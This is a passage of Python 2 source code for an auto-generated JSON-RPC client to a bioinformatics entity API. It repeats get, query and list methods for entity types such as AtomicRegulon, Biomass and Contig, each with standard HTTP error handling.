body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_AssociationDetectionType(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_AssociationDetectionType',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_AssociationDetectionType(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_AssociationDetectionType',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_AssociationDetectionType(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_AssociationDetectionType',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_AtomicRegulon(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_AtomicRegulon',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_AtomicRegulon(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_AtomicRegulon',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_AtomicRegulon(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_AtomicRegulon',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Attribute(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Attribute',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Attribute(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Attribute',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Attribute(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Attribute',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Biomass(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Biomass',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Biomass(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Biomass',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Biomass(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Biomass',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_CodonUsage(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_CodonUsage',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_CodonUsage(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_CodonUsage',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_CodonUsage(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_CodonUsage',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Complex(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Complex',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Complex(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Complex',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Complex(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Complex',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Compound(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Compound',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Compound(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Compound',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Compound(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Compound',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_CompoundInstance(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_CompoundInstance',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_CompoundInstance(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_CompoundInstance',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_CompoundInstance(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_CompoundInstance',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ConservedDomainModel(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ConservedDomainModel',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ConservedDomainModel(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ConservedDomainModel',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ConservedDomainModel(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ConservedDomainModel',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Contig(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Contig',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Contig(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Contig',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Contig(self, start, count, fields):
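        """Return the requested fields for count Contig entities from offset start."""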
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Contig',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ContigChunk(self, ids, fields):
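        """Return the requested fields for each ContigChunk entity named in ids."""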
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ContigChunk',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ContigChunk(self, qry, fields):
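        """Return the requested fields for ContigChunk entities matching qry."""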
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ContigChunk',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ContigChunk(self, start, count, fields):
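        """Return the requested fields for count ContigChunk entities from offset start."""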
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ContigChunk',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ContigSequence(self, ids, fields):
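        """Return the requested fields for each ContigSequence entity named in ids."""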
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ContigSequence',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ContigSequence(self, qry, fields):
